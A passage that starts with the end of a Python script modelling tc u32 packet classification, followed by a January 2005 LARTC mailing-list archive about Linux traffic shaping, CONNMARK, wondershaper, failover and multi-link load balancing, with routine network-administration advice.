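                     bytes([10, 0, 0, 5]), bytes([192, 0, 2, 1])) + ip_opts
    tcp = struct.pack("!HHIIBBHHH", 40000, 80, 1000, ack_no, doff << 4, flags,
                      65535, 0, 0) + tcp_opts
    return ip + tcp + bytes(payload_len)


def classify(packet):
    """Return '1:10' if either eth1 u32 filter matches, else None (the packet
    then falls through to the fw-mark filters and the htb default, which are
    not modelled here)."""
    if u32_match(packet, TOS_FILTER) or u32_match(packet, ACK_FILTER):
        return "1:10"
    return None


TIMESTAMPS = bytes([1, 1, 8, 10]) + bytes(8)    # NOP, NOP, timestamp option
IP_PADDING = bytes([1, 1, 1, 0])                # NOP, NOP, NOP, end of list

# Constructed sample packets.
SAMPLES = {
    "bare ACK, 40 bytes": build_packet(ACK),
    "ACK + timestamps, 52 bytes": build_packet(ACK, tcp_opts=TIMESTAMPS),
    "ACK + 23 bytes data, 63 bytes": build_packet(ACK, payload_len=23),
    "ACK + 24 bytes data, 64 bytes": build_packet(ACK, payload_len=24),
    "SYN+ACK": build_packet(SYN | ACK),
    "FIN+ACK": build_packet(FIN | ACK),
    "bare ACK with IP options": build_packet(ACK, ip_opts=IP_PADDING),
    "bulk data, TOS 0x10": build_packet(ACK | PSH, payload_len=1400, tos=0x10),
    "bulk data, TOS 0": build_packet(ACK | PSH, payload_len=1400),
}

# With 4 bytes of IP options the TCP header starts at byte 24, so byte 33 is
# the second byte of the acknowledgement number, not the flags byte.
SHIFTED = build_packet(PSH | ACK, payload_len=10, ip_opts=IP_PADDING,
                       ack_no=0x00100000)


def run_samples():
    """Classify every constructed sample packet."""
    return {name: classify(pkt) for name, pkt in SAMPLES.items()}


if __name__ == "__main__":
    for name, cls in run_samples().items():
        print(f"{name:32s} -> {cls or 'no u32 match'}")
    print("PSH+ACK with IP options, no IHL selector:", u32_match(SHIFTED, NO_IHL_GUARD))
    print("PSH+ACK with IP options, full filter:   ", u32_match(SHIFTED, ACK_FILTER))
```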
From dseshadri@broadbandmaritime.com Sat Jan 8 16:16:16 2005 From: dseshadri@broadbandmaritime.com (Deepak Seshadri) Date: Sat, 8 Jan 2005 11:16:16 -0500 Subject: [LARTC] TC GUI or graphs? In-Reply-To: <20050105173006.10237.qmail@web12302.mail.yahoo.com> Message-ID: <200501081616.j08GGG81040321@jkcpub.iserver.net> Thank you very much for the replies, Jason, Horst & Jonathan. I'll look into all these options. Deepak Seshadri > -----Original Message----- > From: lartc-admin@mailman.ds9a.nl [mailto:lartc-admin@mailman.ds9a.nl] On > Behalf Of Jonathan Day > Sent: Wednesday, January 05, 2005 12:30 PM > To: jasonb@edseek.com; lartc@mailman.ds9a.nl > Subject: Re: [LARTC] TC GUI or graphs? > > There are GUIs for HTB, but no guarantee they'll work > with current systems or with what you want to do. > > http://freshmeat.net/projects/easyshape/ > http://freshmeat.net/projects/khtb/ > http://freshmeat.net/projects/ktctool/ > http://freshmeat.net/projects/bwmtools/ > http://freshmeat.net/projects/htbgui/ > http://freshmeat.net/projects/arbitrator/ > http://freshmeat.net/projects/ibmonitor/ > > P.S. I rarely use Google to search for software. :) > > --- Jason Boxman wrote: > > > On Wednesday 05 January 2005 09:55, Deepak Seshadri > > wrote: > > > Hello everybody, > > > > > > I am new to the lartc mailing list. I have been > > using "tc" for some time > > > now. To be precise, tc & HTB to shape traffic. I > > did a lot of search on > > > Google for 2 things: > > > > > > - A GUI to create configure new qdiscs & classes > > for HTB > > > > There are two projects, the one I remember being > > lql, designed at creating > > libraries for plugging into netlink directly for QoS > > stuff. One of these > > days there will probably be a nice GUI available. > > Presently I don't know of > > any. > > > > > __________________________________ > Do you Yahoo!? > Yahoo! Mail - now with 250MB free storage. Learn more. 
> http://info.mail.yahoo.com/mail_250 > _______________________________________________ > LARTC mailing list / LARTC@mailman.ds9a.nl > http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/ From lists@L8R.net Sat Jan 8 20:13:56 2005 From: lists@L8R.net (Brad Barnett) Date: Sat, 8 Jan 2005 15:13:56 -0500 Subject: [LARTC] problems with 2.4.28 + Julian's patch Message-ID: <20050108151356.563f2682@be.back.l8r.net> With 2.4.28 and Julian Anastasov's http://www.ssi.bg/~ja/routes-2.4.27-9.diff patch, I get the following when I attempt to build my kernel. Any ideas? Thanks! gcc -D__KERNEL__ -I/usr/src/linux/include -Wall -Wstrict-prototypes -Wno-trigraphs -O2 -fno-strict-aliasing -fno-common -fomit-frame-pointer -pipe -mpreferred-stack-boundary=2 -march=i686 -fno-unit-at-a-time -nostdinc -iwithprefix include -DKBUILD_BASENAME=fib_frontend -c -o fib_frontend.o fib_frontend.c fib_frontend.c: In function `fib_validate_source': /usr/src/linux/include/net/ip_fib.h:178: sorry, unimplemented: inlining failed in call to 'fib_result_table': function body not available fib_frontend.c:253: sorry, unimplemented: called from here /usr/src/linux/include/net/ip_fib.h:178: sorry, unimplemented: inlining failed in call to 'fib_result_table': function body not available fib_frontend.c:263: sorry, unimplemented: called from here make[3]: *** [fib_frontend.o] Error 1 make[3]: Leaving directory `/usr/src/linux/net/ipv4' make[2]: *** [first_rule] Error 2 make[2]: Leaving directory `/usr/src/linux/net/ipv4' make[1]: *** [_subdir_ipv4] Error 2 make[1]: Leaving directory `/usr/src/linux/net' make: *** [_dir_net] Error 2 From ja@ssi.bg Sat Jan 8 20:47:49 2005 From: ja@ssi.bg (Julian Anastasov) Date: Sat, 8 Jan 2005 22:47:49 +0200 (EET) Subject: [LARTC] problems with 2.4.28 + Julian's patch In-Reply-To: <20050108151356.563f2682@be.back.l8r.net> References: <20050108151356.563f2682@be.back.l8r.net> Message-ID: Hello, On Sat, 8 Jan 2005, Brad Barnett wrote: > With 2.4.28 and Julian 
Anastasov's > > http://www.ssi.bg/~ja/routes-2.4.27-9.diff > > patch, I get the following when I attempt to build my kernel. Any ideas? Can you try routes-2.4.28-9.diff, i just uploaded it after removing __inline__. > Thanks! > > gcc -D__KERNEL__ -I/usr/src/linux/include -Wall -Wstrict-prototypes -Wno-trigraphs -O2 -fno-strict-aliasing -fno-common -fomit-frame-pointer -pipe -mpreferred-stack-boundary=2 -march=i686 -fno-unit-at-a-time -nostdinc -iwithprefix include -DKBUILD_BASENAME=fib_frontend -c -o fib_frontend.o fib_frontend.c > fib_frontend.c: In function `fib_validate_source': > /usr/src/linux/include/net/ip_fib.h:178: sorry, unimplemented: inlining failed in call to 'fib_result_table': function body not available > fib_frontend.c:253: sorry, unimplemented: called from here > /usr/src/linux/include/net/ip_fib.h:178: sorry, unimplemented: inlining failed in call to 'fib_result_table': function body not available > fib_frontend.c:263: sorry, unimplemented: called from here > make[3]: *** [fib_frontend.o] Error 1 > make[3]: Leaving directory `/usr/src/linux/net/ipv4' > make[2]: *** [first_rule] Error 2 > make[2]: Leaving directory `/usr/src/linux/net/ipv4' > make[1]: *** [_subdir_ipv4] Error 2 > make[1]: Leaving directory `/usr/src/linux/net' > make: *** [_dir_net] Error 2 Regards -- Julian Anastasov From kasp Sun Jan 9 11:36:10 2005 From: kasp (kasp) Date: Sun, 9 Jan 2005 13:36:10 +0200 Subject: [LARTC] Slow large pings Message-ID: <729574587.20050109133610@inbox.lv> Hello lartc, Testing some rules I found out that any rules are slowing down large pings! 
For example: tc qdisc add dev eth0 root handle 1: htb tc class add dev eth0 parent 1: classid 1:1 htb rate 100Mbit prio 1 ceil 100Mbit tc class add dev eth0 parent 1:1 classid 1:2 htb rate 100Mbit prio 2 ceil 100Mbit tc filter add dev eth0 parent 1:0 prio 5 u32 \ match ip src 10.10.10.1 \ match ip dst 10.10.10.10 \ flowid 1:2 tc qdisc add dev eth0 parent 1:2 handle 2: sfq perturb 10 Small pings are ok - <10ms, here is output for 65500 byte pings: Pinging test [10.10.10.1] with 65500 bytes of data: Reply from 10.10.10.1: bytes=65500 time=120ms TTL=64 Reply from 10.10.10.1: bytes=65500 time=120ms TTL=64 Reply from 10.10.10.1: bytes=65500 time=120ms TTL=64 Reply from 10.10.10.1: bytes=65500 time=120ms TTL=64 Ping statistics for 10.10.10.1: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 120ms, Maximum = 120ms, Average = 120ms If I don't use any rules, 65500 byte pings are about ~10ms Any filters are slowing large pings for 10 times!!! What can I do to tune it up? -- Best regards, kasp mailto:waters@inbox.lv From bhleandro@ig.com.br Sun Jan 9 11:53:24 2005 From: bhleandro@ig.com.br (Leandro Travaglia) Date: Sun, 09 Jan 2005 09:53:24 -0200 Subject: [LARTC] CONNMARK problem In-Reply-To: <41DFDB40.1040000@cardvn.net> References: <1103856503.21586.47.camel@neuromancer.home.net> <41DFD9F4.6020408@ig.com.br> <41DFDB40.1040000@cardvn.net> Message-ID: <41E11B34.8080004@ig.com.br> I see... I'll do this. But..... Is CONNMARK supported in newer versions of the Kernel? Which one? Regards, LEANDRO TRAVAGLIA Nguyen Dinh Nam wrote: > it's because your kernel doesn't support CONNMARK, apply patch-o-matic > then recompile your kernel, then it'll work. 
> > Leandro Travaglia wrote: > >> Hi all, >> >> I have IPTABLES 1.2.10 and i have a weird problem with CONNMARK >> >> When i run: >> # iptables -v -t mangle -F >> # iptables -v -t mangle -A PREROUTING -p tcp -j CONNMARK --restore-mark >> CONNMARK tcp opt -- in * out * 0.0.0.0/0 -> 0.0.0.0/0 CONNMARK >> restore >> iptables: No chain/target/match by that name >> >> Why is that happening?? >> >> The command: >> # iptables -v -j CONNMARK -h >> returns: >> CONNMARK target v1.2.10 options: >> --set-mark value[/mask] Set conntrack mark value >> --save-mark [--mask mask] Save the packet nfmark in the connection >> --restore-mark [--mask mask] Restore saved nfmark value >> >> So everything seems fine to me........ >> >> Thanks... >> >> > > > > From nug@sch.bme.hu Sun Jan 9 18:09:52 2005 From: nug@sch.bme.hu (Tóth Nándor) Date: Sun, 09 Jan 2005 19:09:52 +0100 Subject: [LARTC] traffic shaping gre tunnels Message-ID: <41E17370.5060502@sch.bme.hu> Hi! I have successfully set up traffic shaping at our site using your and others howtos. I have a linux firewall (gateway), two leased lines. I shape only the incoming traffic now. I use HTB+SFQ and sort the packets using iptables with the CLASSIFY patch. It works very well. eth1----ISP2-\ eth2----ISP1--LINUX--internal network eth0 My problem is, that i can not shape my VPN (PPTP) connections. At least at the same interface (eth0) as the other, normal connections. I tried a few configurations, but nothing seemed to work. Maybe i should shape them at the pppx interfaces? But I can not attach one HTB class for multiple interfaces. Can IMQ (http://www.linuximq.net/) solve my problems? Can you give me some advice? Thanks! 
Nandor From cs83152@csie.chu.edu.tw Mon Jan 10 02:25:56 2005 From: cs83152@csie.chu.edu.tw (Vincent) Date: Mon, 10 Jan 2005 10:25:56 +0800 Subject: [LARTC] CONNMARK problem In-Reply-To: <41DFD9F4.6020408@ig.com.br> Message-ID: <002e01c4f6bb$bbeb8c30$aa0ba8c0@l7.com.tw> > -----Original Message----- > From: lartc-admin@mailman.ds9a.nl > [mailto:lartc-admin@mailman.ds9a.nl] On Behalf Of Leandro Travaglia > Sent: Saturday, January 08, 2005 9:03 PM > To: LARTC > Subject: [LARTC] CONNMARK problem > > > Hi all, > > I have IPTABLES 1.2.10 and i have a weird problem with CONNMARK > > When i run: > # iptables -v -t mangle -F > # iptables -v -t mangle -A PREROUTING -p tcp -j CONNMARK > --restore-mark CONNMARK tcp opt -- in * out * 0.0.0.0/0 -> > 0.0.0.0/0 CONNMARK restore > iptables: No chain/target/match by that name Make sure that CONNMARK target is valid in mangle table > PREROUTING chain. Or you can try to inspect the rule in another table/chain Another possibility is the target format. You can try to use a simple target to verify if the target format is correct or not. Vincent > > Why is that happening?? > > The command: > # iptables -v -j CONNMARK -h > returns: > CONNMARK target v1.2.10 options: > --set-mark value[/mask] Set conntrack mark value > --save-mark [--mask mask] Save the packet nfmark in the > connection > --restore-mark [--mask mask] Restore saved nfmark value > > So everything seems fine to me........ > > Thanks... > From cs83152@csie.chu.edu.tw Mon Jan 10 02:48:51 2005 From: cs83152@csie.chu.edu.tw (Vincent) Date: Mon, 10 Jan 2005 10:48:51 +0800 Subject: [LARTC] Tools to get current bandwidth of queue or speed rate? 
In-Reply-To: <002e01c4f6bb$bbeb8c30$aa0ba8c0@l7.com.tw> Message-ID: Hello, Does there exist any tool that can report the current bandwidth information that is managed by tc(traffic control) tool. I can use the tool to get the current(or accumulated) bandwidth used by each tc queue. Thanks for your assist Vincent From Alf.Vahau@upng.ac.pg Mon Jan 10 03:22:44 2005 From: Alf.Vahau@upng.ac.pg (Alfred Vahau) Date: Mon, 10 Jan 2005 13:22:44 +1000 Subject: [LARTC] Personal Firewalls Message-ID: <41E1F504.2010201@upng.ac.pg> Hello, Our ISP provides a firewall and NAT services for our Intranet. However, within the Intranet, there appear to be personal firewalls around some anonymous PCs. The IP addresses of these PCs can be detected by our network monitoring tool. The identity of the user however remains anonymous. Are there any tools that can be used to penetrate the personal firewall and reveal the identity of the users? All our IP addresses fall within specific ranges and the existence of these addresses are against the policies on computer usage. Thanks for any pointers, Alfred Vahau IT Services Uni. PNG -- From shurdeek@routehat.org Mon Jan 10 09:39:26 2005 From: shurdeek@routehat.org (Peter Surda) Date: Mon, 10 Jan 2005 10:39:26 +0100 Subject: [LARTC] Personal Firewalls In-Reply-To: <41E1F504.2010201@upng.ac.pg> References: <41E1F504.2010201@upng.ac.pg> Message-ID: <41E24D4E.8090409@routehat.org> Alfred Vahau wrote: > All our IP addresses fall within > specific ranges and the existence of these addresses are against the > policies on computer usage. In that case it's easy. Block their network access on the router and wait until they contact you :-) > Alfred Vahau > IT Services > Uni. PNG Yours sincerely Peter Surda From fwang@ust.hk Mon Jan 10 15:27:16 2005 From: fwang@ust.hk (Wang Feng) Date: Mon, 10 Jan 2005 23:27:16 +0800 Subject: [LARTC] Could anyone explain the slot and bucket concept in SFQ to me? 
Message-ID: <200501101527.j0AFRG77008922@mx4.ust.hk> Dear all, I'm reading codes in sch_sfq.c in kernel 2.4 of Linux. I find I messed up with the concept of slot, bucket and hash tables. Could anyone explain the data structure of the hash tables a little to me. Thanks very much. Best, Franklin BTW: I can not understand why the number of entries of dep[SFQ_DEPTH*] should be twice:( From Yaman Saqqa Mon Jan 10 17:49:21 2005 From: Yaman Saqqa (Yaman Saqqa) Date: Mon, 10 Jan 2005 19:49:21 +0200 Subject: [LARTC] failover strategies - failing open vs. failing closed. In-Reply-To: <41DDB8CA.2050000@mercs.homeip.net> References: <292B2D5F863ED611BB8B0008021089550315970E@aux.uwm.edu> <41DDB8CA.2050000@mercs.homeip.net> Message-ID: <33bf452f05011009493fe96ec0@mail.gmail.com> OK ... what about syncing connection tracking state tables between the two routers/fw's, is the ct_sync code from netfilter stable .. has anyone used it on a production environment .. the netfilter-failover mailing list is pretty dead ! On Thu, 06 Jan 2005 22:16:42 +0000, Jose Luis Araujo wrote: > Hi. > > Sorry for the delay. Hope you are still interested in the idea. > > Kelly Jeglum wrote: > > >I'd like to setup a box with 2 NICs as a firewall which will also rate > >limits outbound traffic. What happens when/if that box hangs or is > >rebooted? > > > > > If you are doing NAT or routing, then you need to use VRRPD with two > machines. > > >I'd like a solution that when there is a failure, traffic can still go > >through the box even though the firewall and rate limiting functions will no > >longer be in effect. > > > > > If on the other hand you want just the rate limiting, then you can try > something. It only has a drawback, the switch that you will use must > have Vlan and STP. > > The trick is this, you choose three ports, and assign those to, say vlan > 2, then choose another 3 ports and assign those to vlan 3. 
> > Enable STP on both Vlan's, increase the portcost on one port on each > Vlan, and use a crossed cable to link them. > Connect a port from each Vlan to the bridge/rate limiter. > Connect the remaining port to your inner router, and to your outer router. > > Now, the idea is, the Vlan will divide the switch virtually, traffic > from vlan 2 won't go to vlan 3, only if they are physically connected, > they behave like two switches (which will also work, provided that the > switches permit VTP). When everything is working properly, the switch > will see two links from vlan 2 to vlan 3 and will disable the one with > the higher cost (the cross cable), then all your traffic will flow > through the bridge. > If the bridge stops, hangs or is disconnected, the switch will only see one > link (the cross cable) and will enable it, bypassing the bridge. > > I have this setup in operation now, and it works great. > > For those wondering, it is using a cisco 2900XL and the fallback time is > from 30 to 50 seconds. > > Hope it helps > > José Araújo > -- abulyomon www.KiLLTHeUPLiNK.com From Alf.Vahau@upng.ac.pg Mon Jan 10 18:33:33 2005 From: Alf.Vahau@upng.ac.pg (Alfred Vahau) Date: Tue, 11 Jan 2005 04:33:33 +1000 Subject: [LARTC] Personal Firewalls In-Reply-To: <41E24D4E.8090409@routehat.org> References: <41E1F504.2010201@upng.ac.pg> <41E24D4E.8090409@routehat.org> Message-ID: <41E2CA7D.8080504@upng.ac.pg> Thanks for the reply. This is the practice at present. We block off one IP and another pops up. At times, quite a few of them appear. We suspect that some of these guys are disgruntled ex-employees who have unauthorized access or are accessing the network with the help of other staff. 
alfred,

Peter Surda wrote:

> Alfred Vahau wrote:
>
>> All our IP addresses fall within
>> specific ranges and the existence of these addresses are against the
>> policies on computer usage.
>
>
> In that case it's easy. Block their network access on the router and
> wait until they contact you :-)
>
>> Alfred Vahau
>> IT Services
>> Uni. PNG
>
>
> Yours sincerely
> Peter Surda

--

From lists@llondel.org Mon Jan 10 18:47:32 2005
From: lists@llondel.org (David Hough)
Date: Mon, 10 Jan 2005 18:47:32 +0000
Subject: [LARTC] Personal Firewalls
In-Reply-To: <41E2CA7D.8080504@upng.ac.pg>
References: <41E1F504.2010201@upng.ac.pg> <41E24D4E.8090409@routehat.org> <41E2CA7D.8080504@upng.ac.pg>
Message-ID: <1105382852.2452.2.camel@robinton.llondel.org>

On Mon, 2005-01-10 at 18:33, Alfred Vahau wrote:
> Thanks for the reply. This is the practice at present. We block off one
> IP and another pops up.
> At times, quite a few of them appear. We suspect that some of these guys
> are disgruntled ex-employees
> who have unauthorized access or are accessing the network with the help
> of other staff.

It sounds as though you need a script tied in with your DHCP server so
that only recognised MAC addresses get given IP addresses and only those
addresses currently allocated get access via the firewall.

--
Dave
So many gadgets, so little time
http://www.llondel.org/

From vicky.rode@gmail.com Mon Jan 10 19:19:56 2005
From: vicky.rode@gmail.com (Vicky Rode)
Date: Mon, 10 Jan 2005 11:19:56 -0800
Subject: [LARTC] Bandwidth Management Tools - yet another tool
Message-ID: <41E2D55C.8000807@gmail.com>

hi there,

has anyone used this tool? if so any thoughts?

http://bwm-tools.lbsd.net/

regards,
/vicky

From shurdeek@routehat.org Mon Jan 10 19:47:44 2005
From: shurdeek@routehat.org (Peter Surda)
Date: Mon, 10 Jan 2005 20:47:44 +0100
Subject: [LARTC] Personal Firewalls
In-Reply-To: <41E2CA7D.8080504@upng.ac.pg>
References: <41E1F504.2010201@upng.ac.pg> <41E24D4E.8090409@routehat.org> <41E2CA7D.8080504@upng.ac.pg>
Message-ID: <41E2DBE0.7070403@routehat.org>

Alfred Vahau wrote:

> Thanks for the reply. This is the practice at present. We block off
> one IP and another pops up.
> At times, quite a few of them appear. We suspect that some of these
> guys are disgruntled ex-employees
> who have unauthorized access or are accessing the network with the
> help of other staff.

Aha, so you suspect malicious intent and not only accidental behaviour. In that case you shouldn't expect that some other internal information found on the problematic computers is valid either.

However, there is a possibility if you want to find the computer by IP, if you use manageable switches. As you know which IPs are improper, you can also find the corresponding MAC address passively from the router's ARP table (or actively by arping), and the switches will be able to tell you on which port this MAC is plugged. Then you can e.g. shutdown the port or follow the cable to the physical computer location.
> alfred,

Yours sincerely
Peter Surda

From thefirstofthechildren@yahoo.ca Mon Jan 10 19:49:05 2005
From: thefirstofthechildren@yahoo.ca (simms)
Date: Mon, 10 Jan 2005 14:49:05 -0500
Subject: [LARTC] wondershaper with ssh on a non-standard port
Message-ID: <20050110194905.GM13970@queeg>

greetings all,

i've searched high and low for this, but can't seem to find an answer
anywhere..

having read the docs and the wondershaper script itself, it occurred to
me that the documentation promises an immediate drop in interactive app
latency, specifically mentioning SSH as a big winner.
however, looking through the script i can't really tell just *how*
wondershaper figures out which port my SSH daemon is running on.

so what i'd like to know is, if i'm running my sshd on, say, port 222,
do i need to make any changes to the wondershaper script, or will it
figure out the right number automagically (e.g. from /etc/services,
where SSH is already correctly assigned to port 222) ?
(conversely, does it 'need' to figure out this port number at all?)

i ask because while ping time latency has indeed fallen for me since
wondershaper was installed, my custom-port SSH connections are as slow
as ever, especially during large file uploads..

my setup in a nutshell:
- current Debian GNU/Linux 'testing' distribution ('sarge', updated daily)
- kernel 2.4.27 (Debian 'testing' default, not customized)
- wondershaper (v. 1.1a) (from current Debian 'testing')
- Shorewall (v. 2.0.13) also from 'testing'
- 4 Mbit ADSL link via 'modem' on eth0

thank you in advance!
-p

--
If economists were doctors, they would today be mired in malpractice suits.
- John Ralston Saul

From lists@wildgooses.com Mon Jan 10 22:16:02 2005
From: lists@wildgooses.com (Ed Wildgoose)
Date: Mon, 10 Jan 2005 22:16:02 +0000
Subject: [LARTC] wondershaper with ssh on a non-standard port
In-Reply-To: <20050110194905.GM13970@queeg>
References: <20050110194905.GM13970@queeg>
Message-ID: <41E2FEA2.2090208@wildgooses.com>

Hi,

>having read the docs and the wondershaper script itself, it occurred to
>me that the documentation promises an immediate drop in interactive app
>latency, specifically mentioning SSH as a big winner.
>however, looking through the script i can't really tell just *how*
>wondershaper figures out which port my SSH daemon is running on.
>
>so what i'd like to know is, if i'm running my sshd on, say, port 222,
>do i need to make any changes to the wondershaper script, or will it
>figure out the right number automagically (e.g. from /etc/services,
>where SSH is already correctly assigned to port 222) ?
>(conversely, does it 'need' to figure out this port number at all?)
>
>

It's been a while since I looked through wondershaper, but the relevant lines are apparently these:

# TOS Minimum Delay (ssh, NOT scp) in 1:10:

tc filter add dev $DEV parent 1:0 protocol ip prio 10 u32 \
match ip tos 0x10 0xff flowid 1:10

So it seems to be matching based on the "type of service" bits in the IP packet. I seem to remember that SSH actually sets the IP tos bits correctly?

So it *should* work when ssh is on another port.
I guess you need to either tweak the script (if you want a quick fix then just mark anything to/from port 222 as high priority), or else figure out why your packets aren't matching the required rule....

Good luck

Ed W

From junk@maild.mine.nu Tue Jan 11 00:28:33 2005
From: junk@maild.mine.nu (junk@maild.mine.nu)
Date: Tue, 11 Jan 2005 02:28:33 +0200 (IST)
Subject: [LARTC] How to balance OUTBOUND traffic by packet if..
Message-ID: <1483.192.168.1.2.1105403313@maild.mine.nu>

I am still looking for a solution to this problem.......

> junk@maild.mine.nu wrote:
>> Hi,
>> Yes i did give this a try a couple of times before with no success
>>
>> /sbin/iptables -I OUTPUT -m nth --every 2 --packet 1 -t mangle -j MARK
>> --set-mark 0x2
>> /sbin/iptables -I OUTPUT -m nth --every 2 --packet 0 -t mangle -j MARK
>> --set-mark 0x1
>>
>> ip rule :
>> 0: from all lookup local
>> 201: from all fwmark 0x2 lookup 202
>> 201: from all fwmark 0x1 lookup 201
>> 32766: from all lookup main
>> ip route show table 202
>> default via 212.199.28.244 dev ppp1 proto static src 80.178.89.120
>> ip route show table 201
>> default via 212.199.26.111 dev ppp0 proto static src 84.94.148.214
>> ip route show table main
>> 212.199.26.111 dev ppp0 proto kernel scope link src 84.94.148.214
>> 212.199.28.244 dev ppp1 proto kernel scope link src 80.178.89.120
>> default proto static equalize
>> nexthop via 212.199.26.111 dev ppp0 weight 1
>> nexthop via 212.199.28.244 dev ppp1 weight 1
>
>
>
> I must admit I am more into tc than ip so I've never tried it.
>
> My guess is that you need to get rid of equalize/weights as these load
> balance per connection and the routes get cached.
>
> Andy.
>
>

how to use iproute/iptables to balance by packet OUTBOUND traffic between 2 PPP (pptp cable modem and pppoe adsl modem) links to the same ISP .
also by using the fact that the ISP doesn't filter source IP address - meaning i can use either PPP's link assigned IP address as the source IP in the ip header.., it works for both devices.., what i want to achieve is : when uploading a large file , i could use both devices to shoot data but bound only to one source IP.
Naturally i could expect all data to go back through the device with that corresponding IP , at least that is what happens according to ethereal

From gypsy@iswest.com Tue Jan 11 02:31:57 2005
From: gypsy@iswest.com (gypsy)
Date: Mon, 10 Jan 2005 18:31:57 -0800
Subject: [LARTC] How to balance OUTBOUND traffic by packet if..
References: <1483.192.168.1.2.1105403313@maild.mine.nu>
Message-ID: <41E33A9D.99998441@iswest.com>

junk@maild.mine.nu wrote:
>
> I am still looking for a solution to this problem.......
>
> junk@maild.mine.nu wrote:

I realize this is the opposite of what you try to accomplish, but perhaps it will help?

Google "LARTC load balance a file download across two connections - success"

gypsy

From sandeep@netcontinuum.com Tue Jan 11 07:32:55 2005
From: sandeep@netcontinuum.com (Sandeep A.S)
Date: Tue, 11 Jan 2005 13:02:55 +0530
Subject: [LARTC] Openvpn &LARTC
Message-ID: <1105428775.3720.5.camel@sandeep>

I have to do Load balancing and Qos on a Linux box which is having openvpn and iptables running

System is Fedora core 1

Any known issues ?
Or anything I have to take care ?

Thanks
--
Sandeep A.S
Netcontinuum Pvt Ltd

From junk@maild.mine.nu Tue Jan 11 10:02:32 2005
From: junk@maild.mine.nu (junk@maild.mine.nu)
Date: Tue, 11 Jan 2005 12:02:32 +0200 (IST)
Subject: [LARTC] How to balance OUTBOUND traffic by packet if..
Message-ID: <1275.192.168.1.2.1105437752@maild.mine.nu>

Hey thanks for replying , i got this from ethereal ..:

tethereal -i ppp0
Capturing on ppp0
0.000000 80.178.69.24 -> 67.15.162.64 TCP 31604 > 53880 [ACK] Seq=0 Ack=0 Win=5680 Len=1360
0.201730 80.178.69.24 -> 67.15.162.64 TCP [TCP Previous segment lost] 31604 > 53880 [ACK] Seq=2720 Ack=0 Win=5680 Len=1360
0.301142 80.178.69.24 -> 67.15.162.64 TCP [TCP Previous segment lost] 31604 > 53880 [PSH, ACK] Seq=5440 Ack=0 Win=5680 Len=1360
0.417813 80.178.69.24 -> 67.15.162.64 TCP [TCP Previous segment lost] 31604 > 53880 [ACK] Seq=8160 Ack=0 Win=5680 Len=1360
0.516307 80.178.69.24 -> 67.15.162.64 TCP [TCP Previous segment lost] 31604 > 53880 [ACK] Seq=10880 Ack=0 Win=5680 Len=1360
0.599234 80.178.69.24 -> 67.15.162.64 TCP [TCP Previous segment lost] 31604 > 53880 [ACK] Seq=13600 Ack=0 Win=5680 Len=1360
0.647668 80.178.69.24 -> 67.15.162.64 TCP [TCP Previous segment lost] 31604 > 53880 [ACK] Seq=16320 Ack=0 Win=5680 Len=1360
0.699314 80.178.69.24 -> 67.15.162.64 TCP [TCP Previous segment lost] ....

tethereal -i ppp1
Capturing on ppp1
0.000000 67.15.162.64 -> 80.178.69.24 TCP 53880 > 31604 [ACK] Seq=0 Ack=0 Win=44880 Len=0 SLE=3114001847 SRE=3114003207 SLE=3113999127 SRE=3114000487 SLE=3113996407 SRE=3113997767 SLE=3113993687 SRE=3113995047
0.008278 80.178.69.24 -> 67.15.162.64 TCP [TCP Previous segment lost] 31604 > 53880 [PSH, ACK] Seq=43520 Ack=0 Win=5680 Len=1360
0.014025 67.15.162.64 -> 80.178.69.24 TCP [TCP Dup ACK 1#1] 53880 > 31604 [ACK] Seq=0 Ack=0 Win=46240 Len=0 SLE=3114004567 SRE=3114005927 SLE=3114001847 SRE=3114003207 SLE=3113999127 SRE=3114000487 SLE=3113996407 SRE=3113997767
0.091375 67.15.162.64 -> 80.178.69.24 TCP [TCP Dup ACK 1#2] 53880 > 31604 [ACK] Seq=0 Ack=0 Win=46240 Len=0 SLE=3114007287 SRE=3114008647 SLE=3114004567 SRE=3114005927 SLE=3114001847 SRE=3114003207 SLE=3113999127 SRE=3114000487
0.098127 67.15.162.64 -> 80.178.69.24 TCP 53880 > 31604 [ACK] Seq=0 Ack=2720 Win=43520 Len=0 SLE=3114007287 SRE=3114008647 SLE=3114004567 SRE=3114005927 SLE=3114001847 SRE=3114003207 SLE=3113999127 SRE=3114000487
0.175701 67.15.162.64 -> 80.178.69.24 TCP [TCP Dup ACK 5#1] 53880 > 31604 [ACK] Seq=0 Ack=2720 Win=44880 Len=0 SLE=3114010007 SRE=3114011367 SLE=3114007287 SRE=3114008647 SLE=3114004567 SRE=3114005927 SLE=3114001847 SRE=3114003207
0.175892 80.178.69.24 -> 67.15.162.64 TCP [TCP Previous segment lost] 31604 > 53880 [ACK] Seq=46240 Ack=0 Win=5680 Len=1360
.....

Combine nth match with ROUTE target and you will get it.

ip ro re default dev ppp0
iptables -A POSTROUTING -t mangle -o ppp+ -m nth --every 2 --packet 0 -j ROUTE --oif ppp0
iptables -A POSTROUTING -t mangle -o ppp+ -m nth --every 2 --packet 1 -j ROUTE --oif ppp1
iptables -A POSTROUTING -t nat -o ppp+ -j SNAT --to $ppp0_ip_addr

I just guess that it'll work, I don't have IP spoofing enabled lines to test

I am still looking for a solution to this problem.......
> junk@maild.mine.nu wrote:
>> Hi,
>> Yes i did give this a try a couple of times before with no success
>>
>> /sbin/iptables -I OUTPUT -m nth --every 2 --packet 1 -t mangle -j MARK
>> --set-mark 0x2
>> /sbin/iptables -I OUTPUT -m nth --every 2 --packet 0 -t mangle -j MARK
>> --set-mark 0x1
>>
>> ip rule :
>> 0: from all lookup local
>> 201: from all fwmark 0x2 lookup 202
>> 201: from all fwmark 0x1 lookup 201
>> 32766: from all lookup main
>> ip route show table 202
>> default via 212.199.28.244 dev ppp1 proto static src 80.178.89.120
>> ip route show table 201
>> default via 212.199.26.111 dev ppp0 proto static src 84.94.148.214
>> ip route show table main
>> 212.199.26.111 dev ppp0 proto kernel scope link src 84.94.148.214
>> 212.199.28.244 dev ppp1 proto kernel scope link src 80.178.89.120
>> default proto static equalize
>> nexthop via 212.199.26.111 dev ppp0 weight 1
>> nexthop via 212.199.28.244 dev ppp1 weight 1
>
>
>
> I must admit I am more into tc than ip so I've never tried it.
>
> My guess is that you need to get rid of equalize/weights as these load balance per connection and the routes get cached.
>
> Andy.
>
>

how to use iproute/iptables to balance by packet OUTBOUND traffic between 2 PPP (pptp cable modem and pppoe adsl modem) links to the same ISP .
